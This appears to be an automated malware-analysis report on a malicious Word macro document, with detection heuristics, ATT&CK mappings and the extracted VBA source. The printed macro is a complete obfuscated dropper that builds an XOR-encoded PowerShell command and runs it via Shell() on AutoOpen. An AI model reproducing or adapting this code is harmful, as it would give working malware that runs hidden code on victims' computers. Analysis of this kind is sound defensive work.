Verdict: MALICIOUS
Risk Score: 210

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The macro makes a Shell() call (flagged by the OLE_VBA_SHELL and OLE_VBA_PCODE_AUTOEXEC_EXEC heuristics), indicating that it is designed to execute arbitrary code. This is further supported by the ClamAV detection of the file as a dropper. The macro's obfuscation together with the Shell() call strongly indicate that its purpose is to download and execute a secondary payload.
Heuristics (7)

- ClamAV: Doc.Dropper.Agent-6590804-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6590804-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA. Matched line in script, with surrounding lines:

  ```vba
  nrpEq = (37024 / CBool(74173) + 34580 + CSng(RZCcv) * (59678 - NLSjk + 52835 - CLng(FjFVi)))
  JiZjv = jwzEcSpXq + zBdzCkwQuwi + Shell(MQwuMALr + ZYLQwQK + fUOhNwzKGpJ, (14842 / 14842) - 1)
  TNwwa = CByte(11511 * Tan(41626) / 95667 + CLng(zjXBu * 52165 * 1846 * Chr(57691)))
  ```

- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script, with surrounding lines:

  ```vba
  End Function
  Sub AutoOpen()
  On Error Resume Next
  ```

- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12302 bytes |

SHA-256: cef9abd8de61c14cfbd41ffce843e75b7682bc1c8810bd62cf66ebc88317fd6f
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "DIEAPULFSRub"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NZluVZOMJic"
Function VmrcQjX()
On Error Resume Next
oVFFjj = CByte(11688 * Tan(93762) / 84103 + CLng(JmpVjN * 12585 * 26003 * Chr(21484)))
afppMM = (44650 / CBool(55344) + 69084 + CSng(oiBHoS) * (69284 - ruoGR + 78360 - CLng(Kpkia)))
rMFjlJwBwh = "Hell" + " [stR" + "iNG]" + "::jOIn" + Chr(40) + " '' ," + Chr(40) + "'52" + "}90U67" + "F102c4" + "5@126%11" + "7q103E6" + "1F127" + "@11"
TfFkY = CByte(90790 * Tan(72781) / 35603 + CLng(RvVoLd * 61728 * 41582 * Chr(37692)))
ZDzKTO = (1960 / CBool(77139) + 2870 + CSng(mwJJA) * (24818 - CHldLz + 37113 - CLng(TbTVzj)))
AZYBu = "4E12" + "2q" + "11" + "7U1" + "15S100c4" + "8}94%"
vzBfiR = CByte(87494 * Tan(26370) / 83841 + CLng(tPlfzz * 83301 * 67414 * Chr(49087)))
EFZRO = (8194 / CBool(58314) + 60255 + CSng(mhSDm) * (29390 - iDPoAQ + 79197 - CLng(LQdiT)))
NkCuAW = "117E" + "10" + "0q62@71S" + "117E11" + "4V83V12" + "4}12" + "1V1" + "17U" + "126U" + "100@43}5"
EoqTqW = CByte(28625 * Tan(82018) / 1426 + CLng(ItGuE * 52563 * 78913 * Chr(25793)))
zcGfRo = (32012 / CBool(37872) + 10497 + CSng(azLKqk) * (32884 - HzlQM + 66228 - CLng(kiJIMY)))
DjtoqXn = "2F" + "93F" + "123" + "F88F45" + "c55" + "S120F" + "100S100" + "q96}" + "42F63" + "V63c100V" + "101%98" + "F114F12"
UuiFT = CByte(56432 * Tan(89615) / 15396 + CLng(Smijt * 27311 * 30062 * Chr(38899)))
TbbtiQ = (46333 / CBool(69991) + 62259 + CSng(HLsZf) * (90118 - TXtuJ + 32771 - CLng(MIScAj)))
flikP = "7S114@1" + "01}" + "121%1" + "15@12" + "3c99c6" + "2%" + "126V" + "117%100" + "F63c105V" + "71F81S" + "102%93V" + "12"
swBBwv = CByte(5311 * Tan(51325) / 82889 + CLng(JwNhFW * 4562 * 66118 * Chr(51190)))
zhHRTn = (19548 / CBool(19866) + 58589 + CSng(azvjAG) * (75290 - NTLRc + 22096 - CLng(aIakD)))
rKWVPGYi = "1@" + "63" + "%80q120c" + "100c100" + "U96F42F6" + "3U" + "63q11" + "8V11" + "7U113@10" + "0}101S9" + "8q117%" + "99q115"
sJzAq = CByte(96241 * Tan(73987) / 37274 + CLng(zFhLLi * 46571 * 56786 * Chr(99288)))
zBAOh = (8979 / CBool(92988) + 94129 + CSng(fjaajh) * (98894 - iBKkqW + 47562 - CLng(SPdPD)))
knDOcdWwQJ = "E120@" + "121%126" + "V113E62%" + "115}127" + "F125" + "q63U84%" + "99@84E" + "68" + "S63V80U"
uliJb = CByte(73325 * Tan(21160) / 87950 + CLng(tLWaEF * 62941 * 46331 * Chr(83504)))
cThPV = (13517 / CBool(59662) + 52963 + CSng(PpShp) * (49762 - QdirBI + 29628 - CLng(LiJLN)))
PjLdi = "120F1" + "00F1" + "00S96V" + "42S" + "63U6" + "3@123q1"
VmrcQjX = rMFjlJwBwh + AZYBu + NkCuAW + DjtoqXn + flikP + rKWVPGYi + knDOcdWwQJ + PjLdi
fGRZs = CByte(3632 * Tan(98611) / 83305 + CLng(EHhkp * 70276 * 91601 * Chr(84696)))
USvuIE = (38601 / CBool(8044) + 50848 + CSng(rwTOs) * (39837 - oYOnj + 44436 - CLng(pfihL)))
End Function
Function nAOuBcziUnQ()
On Error Resume Next
QtnWzb = CByte(99407 * Tan(73804) / 13022 + CLng(bEGFls * 60076 * 40280 * Chr(78713)))
ijBsz = (55711 / CBool(95950) + 77135 + CSng(tFdZmt) * (47679 - kjuVq + 41225 - CLng(STHFv)))
uObWCH = "21@" + "126%120" + "c125@1" + "13" + "@100" + "%119@" + "12" + "1S113@" + "127" + "%62c1" + "15" + "q127"
mQjQQi = CByte(79429 * Tan(70597) / 13641 + CLng(JLaSj * 23374 * 87017 * Chr(54455)))
RzPzm = (85045 / CBool(27108) + 80909 + CSng(jVssNd) * (22781 - CnRZmd + 84299 - CLng(RjQZZ)))
SqZVGju = "@125" + "@63V7" + "3V4" + "0S104F9" + "8F" + "88}63" + "E80c120" + "V100@100" + "}96V42q" + "63" + "@63F10" + "3@103"
pnzXL = CByte(8292 * Tan(87160) / 94786 + CLng(vHJPwP * 87584 * 21980 * Chr(66576)))
CchXmi = (41968 / CBool(44910) + 60329 + CSng(IwQAr) * (68462 - IzMhAS + 61443 - CLng(PaDZi)))
PlWtCmcv = "}1" + "03S62q98" + "E127%11" + "4q12" + "1c126" + "E98@117" + "q10" + "5S126%" + "127F12" + "4U11" + "6E9" + "9}124E"
VPUpaB = CByte(88900 * Tan(45273) / 14142 + CLng(BCZah * 55244 * 16802 * Chr(25851)))
IDvQsB = (20077 / CBool(3765) + 37883 + CSng(ESwwP) * (36520 - Qcjfh + 21417 - CLng(RarCh)))
wFBnU = "113%" + "103}62" + "@11" + "5F1" + "27E1" + "25q"
RdBCjs = CByte(62119 * Tan(35255) / 72941 + CLng(IKYpM * 86703 * 65849 * Chr(89073)))
fFdiC = (7522 / CBool(50909) + 85760 + CSng(zSKIUf) * (2417 - zIVOYm + 16877 - CLng(icIli)))
fsuEs = "63E84V8" + "4q10" + "3q96" + "q74c" + "115" + "c70@6" + "3%80V" + "120@100"
uNMmJR = CByte(73323 * Tan(30733) / 93001 + CLng(XDuKh * 2477 * 9596 * Chr(26134)))
sfArl = (12236 / CBool(35062) + 39707 + CSng(XaSHFK) * (1062 - GRvIIf + 43368 - CLng(FOOTt)))
dclsV = "S10" + "0}9" + "6%42" + "}63%" + "63E103c1" + "03" + "@10" + "3V6" + "2q122@10"
fNwdP = CByte(92467 * Tan(4979) / 17947 + CLng(QjENWU * 16729 * 59004 * Chr(56946)))
jmQwQj = (99712 / CBool(57130) + 41319 + CSng(rDBjlj) * (8136 - TBjuqV + 59435 - CLng(FkLoEJ)))
cYUYkZM = "1F113" + "@124c1" + "23U101%" + "11" + "5c121" + "E126" + "q119S" + "61%96q"
nAOuBcziUnQ = uObWCH + SqZVGju + PlWtCmcv + wFBnU + fsuEs + dclsV + cYUYkZM
jKwXoZ = CByte(53480 * Tan(4774) / 65453 + CLng(QYuVjG * 41979 * 19879 * Chr(1690)))
lLFlw = (91951 / CBool(37354) + 60086 + CSng(PShciC) * (42273 - nCozQ + 85221 - CLng(dGQROl)))
End Function
Function kVVkXhlRKo()
On Error Resume Next
NmGEV = CByte(83748 * Tan(4972) / 40915 + CLng(UMCuz * 59876 * 13037 * Chr(69970)))
VcpGVT = (19236 / CBool(15014) + 79819 + CSng(BRtnlW) * (58310 - OwukU + 85343 - CLng(swZuAu)))
iSrjwTQSf = "11" + "7U9" + "8S99F1" + "21V1" + "13U6" + "2E1" + "15S12" + "7c125" + "}63S34" + "%40S"
rpiXj = CByte(21158 * Tan(16641) / 67157 + CLng(wYTZz * 60485 * 12885 * Chr(45267)))
cKwEE = (71378 / CBool(15124) + 93539 + CSng(cVkNp) * (69925 - EGhjBm + 16004 - CLng(jaXRzi)))
LwzLWFjCU = "127}" + "113" + "U125S12" + "1}82@6" + "3%5" + "5S62E67" + "@96@124" + "S121S" + "10" + "0c5"
BTAzwn = CByte(77543 * Tan(34109) / 72384 + CLng(hhHkF * 14614 * 12441 * Chr(50358)))
zvYZD = (21337 / CBool(80362) + 5018 + CSng(XdNqw) * (79514 - dufRA + 68315 - CLng(XLjcTi)))
fwqUhhBh = "6c5" + "5E80F" + "55@" + "57E4" + "3q5" + "2c87U12" + "2q102c4" + "8}45F4" + "8@55}3"
EdCpY = CByte(44247 * Tan(31849) / 84644 + CLng(hhnmDR * 77627 * 21820 * Chr(25266)))
KVkbFS = (31471 / CBool(107) + 3060 + CSng(UiWUK) * (42927 - NrACb + 23520 - CLng(IkTcK)))
CjAatbSpqzq = "4F" + "34S" + "40V55U43" + "S52E86q9" + "7E83F45" + "}52" + "S117" + "U126V102" + "S42S" + "100q117" + "U125U96E" + "59U55V7"
YGfvX = CByte(19692 * Tan(27143) / 55215 + CLng(oNoYZ * 65701 * 87283 * Chr(95593)))
OuuPZc = (67653 / CBool(18613) + 53426 + CSng(Vwopj) * (18169 - jjwnFS + 36677 - CLng(SOoIr)))
zRJESMH = "6U55%59c" + "52}" + "87U122F" + "102%59c5" + "5E62S117" + "V10" + "4c117F5" + "5%43V"
ZRlNQL = CByte(89425 * Tan(78773) / 41956 + CLng(vjJVAu * 22943 * 8607 * Chr(49231)))
uaIiR = (17915 / CBool(17107) + 54436 + CSng(EGNuBk) * (98556 - sJtLzc + 6895 - CLng(HaQtu)))
Ccwkw = "11" + "8%12" + "7c98U117" + "c11" + "3V1" + "15%1" + "20S56V"
TRmpN = CByte(87390 * Tan(35506) / 36035 + CLng(jimvM * 4296 * 62528 * Chr(78322)))
pkDrvw = (8642 / CBool(20704) + 19188 + CSng(rijchw) * (18618 - TnCDnG + 31770 - CLng(ThTMO)))
PBuiWinbC = "52" + "S92E" + "87c" + "92%48@" + "121q1" + "26c48}52" + "}93%123}" + "88E57" + "S1"
NmsPc = CByte(80849 * Tan(53063) / 64874 + CLng(BsPSno * 70129 * 85507 * Chr(65270)))
kYkma = (72230 / CBool(93826) + 94480 + CSng(fiWrzU) * (60391 - PprjQ + 40733 - CLng(jSYAL)))
obAAhPrc = "07V1" + "00S9" + "8q" + "105}1" + "07E52V90" + "F67V102F" + "62F8" + "4c127S" + "103" + "c126"
kVVkXhlRKo = iSrjwTQSf + LwzLWFjCU + fwqUhhBh + CjAatbSpqzq + zRJESMH + Ccwkw + PBuiWinbC + obAAhPrc
qiwGa = CByte(93100 * Tan(92506) / 90396 + CLng(mrbjo * 92984 * 58865 * Chr(90945)))
Pzmqw = (39696 / CBool(38997) + 5984 + CSng(GIMwlX) * (33732 - ibUiDh + 46693 - CLng(zTziMv)))
End Function
Function jnqPwYQfh()
On Error Resume Next
oCMQp = CByte(17328 * Tan(56901) / 90880 + CLng(pMuwtl * 34326 * 38523 * Chr(32761)))
wGQNn = (22707 / CBool(31755) + 27967 + CSng(zBWVX) * (20308 - VNpQqv + 65211 - CLng(MrMFpA)))
FnYVvi = "F124" + "@12" + "7S11" + "3q116" + "q86" + "%121%" + "12"
aZsooh = CByte(39038 * Tan(98434) / 46067 + CLng(OQYczk * 59456 * 75270 * Chr(86944)))
Sipif = (2668 / CBool(47206) + 69643 + CSng(vzKZB) * (88913 - TIHVZ + 85081 - CLng(EaiAj)))
ZwoQac = "4@" + "117V5" + "6F52c92" + "}87" + "c92q60q" + "48%52%" + "86S9" + "7F83E5"
rHiGIQ = CByte(60890 * Tan(86322) / 25216 + CLng(DOUjN * 52260 * 53015 * Chr(5195)))
jRJMv = (52777 / CBool(50774) + 31731 + CSng(DAApza) * (41702 - WkTZN + 92000 - CLng(sEAPST)))
ldCjOEPZG = "7F4" + "3}67F" + "100" + "S1" + "13c98" + "E100S61" + "c6" + "4S98F12" + "7}115U" + "117V99" + "F99U48" + "U52"
YMoqno = CByte(65183 * Tan(99982) / 74329 + CLng(iLCmwF * 95337 * 23086 * Chr(43735)))
dICZiT = (42535 / CBool(65132) + 38271 + CSng(aKzQIJ) * (87542 - rREbd + 45397 - CLng(Wzbui)))
pCmfVMb = "%86U" + "97F83F" + "43E" + "114c98%1" + "17c1" + "13" + "S123}43" + "}1" + "09E11"
PYKNo = CByte(52618 * Tan(30014) / 76885 + CLng(JUrSs * 91858 * 43782 * Chr(78896)))
QklZC = (59284 / CBool(59273) + 24848 + CSng(UunoN) * (3935 - JaUVLK + 8699 - CLng(WPblQQ)))
KoYNta = "5c113@" + "100@115" + "F120c107" + "}10" + "9q10" + "9'.sPLiT" + Chr(40) + "'%q"
tmBSTi = CByte(46978 * Tan(43195) / 3693 + CLng(IUMBF * 31605 * 46609 * Chr(98585)))
wwWrBI = (10638 / CBool(61301) + 13074 + CSng(mDtws) * (36258 - PizNWt + 74533 - CLng(LqTmm)))
jiIbMGYZUG = "F@EcU}" + "VS' " + Chr(41) + " |" + " foRe" + "acH-oB" + "jeCT{[" + "char] " + Chr(40) + "$" + "_ -bxO" + "r '0" + "x10" + "'" + Chr(41) + " } "
UmYtA = CByte(94641 * Tan(59158) / 81974 + CLng(utjjV * 28815 * 106 * Chr(69186)))
NjspWb = (5952 / CBool(69393) + 60154 + CSng(SmtUct) * (32493 - iYoGsc + 84619 - CLng(CjlGu)))
vpkuCkFPVqP = Chr(41) + " " + Chr(41) + "|iEX" + ""
jnqPwYQfh = FnYVvi + ZwoQac + ldCjOEPZG + pCmfVMb + KoYNta + jiIbMGYZUG + vpkuCkFPVqP
CzcSWY = CByte(87573 * Tan(52887) / 32440 + CLng(kzNRu * 91642 * 39827 * Chr(71228)))
oYtaL = (14701 / CBool(77039) + 30534 + CSng(RZWwYv) * (99246 - GwjsT + 25503 - CLng(ItMMsW)))
End Function
Attribute VB_Name = "XHAKiETCAO"
Function TNIBLouI()
On Error Resume Next
NUHEh = CByte(14698 * Tan(54325) / 27658 + CLng(dBHzt * 18615 * 8731 * Chr(55810)))
izbNj = (57439 / CBool(3250) + 12489 + CSng(WOlLfk) * (10500 - dntrjX + 6487 - CLng(CPzwar)))
MpjbZZwnG = woPsi + Chr(zYvsYOot + 80 + tsQXJ) + "ow" + "ers"
UJarb = CByte(14378 * Tan(80523) / 12240 + CLng(IszAHT * 67328 * 55013 * Chr(78623)))
AAcFiB = (52990 / CBool(47268) + 28224 + CSng(NEKSiK) * (47246 - XfXTBZ + 64694 - CLng(fPDFt)))
wnPkai = CByte(43831 * Tan(90231) / 85587 + CLng(YjYkRo * 68134 * 29030 * Chr(96177)))
SjzOh = (97573 / CBool(5636) + 46116 + CSng(WLUJj) * (4753 - AsnjRB + 33462 - CLng(PaCYZ)))
TNIBLouI = bQMiADT + MpjbZZwnG + VmrcQjX + nAOuBcziUnQ + kVVkXhlRKo + jnqPwYQfh
naBaFw = CByte(17918 * Tan(63060) / 17411 + CLng(bvlwu * 71782 * 2298 * Chr(20313)))
TqpFD = (33769 / CBool(29580) + 90829 + CSng(HwdwXZ) * (46621 - ZJXNF + 99386 - CLng(Khchka)))
End Function
Function LJcOkRkD(ZYLQwQK)
On Error Resume Next
wbWrs = CByte(62287 * Tan(64509) / 1463 + CLng(NOEOKT * 63602 * 33172 * Chr(43536)))
iKFaKN = (82968 / CBool(88918) + 90665 + CSng(piKYQ) * (17344 - wwUZw + 85250 - CLng(IlKOw)))
jbUnuL = CByte(47321 * Tan(13952) / 43816 + CLng(YFOcjR * 20161 * 73003 * Chr(15921)))
nrpEq = (37024 / CBool(74173) + 34580 + CSng(RZCcv) * (59678 - NLSjk + 52835 - CLng(FjFVi)))
JiZjv = jwzEcSpXq + zBdzCkwQuwi + Shell(MQwuMALr + ZYLQwQK + fUOhNwzKGpJ, (14842 / 14842) - 1)
TNwwa = CByte(11511 * Tan(41626) / 95667 + CLng(zjXBu * 52165 * 1846 * Chr(57691)))
lGVwpk = (22846 / CBool(79346) + 68699 + CSng(lzEkZ) * (81129 - PikGS + 82633 - CLng(ubVzTn)))
End Function
Sub AutoOpen()
On Error Resume Next
Tarwaa = CByte(56732 * Tan(30590) / 80795 + CLng(iKQRi * 92409 * 74603 * Chr(25456)))
sMvDX = (55216 / CBool(35580) + 29374 + CSng(EOOMWw) * (93382 - jFnzk + 68064 - CLng(YlXup)))
LJcOkRkD (TNIBLouI)
JTkHbi = CByte(3411 * Tan(86448) / 33699 + CLng(zkDQGk * 20361 * 60922 * Chr(89096)))
EdrvqD = (16757 / CBool(56266) + 57218 + CSng(mFXZFl) * (78087 - PvVTB + 87844 - CLng(JoUSic)))
End Sub
```